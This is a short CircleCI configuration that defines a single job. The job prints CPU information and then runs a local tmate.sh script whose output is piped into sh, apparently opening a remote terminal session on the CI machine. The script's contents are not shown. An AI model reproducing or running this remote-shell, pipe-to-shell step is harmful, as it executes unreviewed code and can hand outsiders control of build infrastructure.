version: 2.1
jobs:
  trial:
    machine:
      image: ubuntu-1604:202104-01
    parallelism: 1
    steps:
      - checkout
      - run: lscpu
      - run: chmod +x tmate.sh && ./tmate.sh -O - | sh

workflows:
  version: 2.1
  build:
    jobs:
      - trial
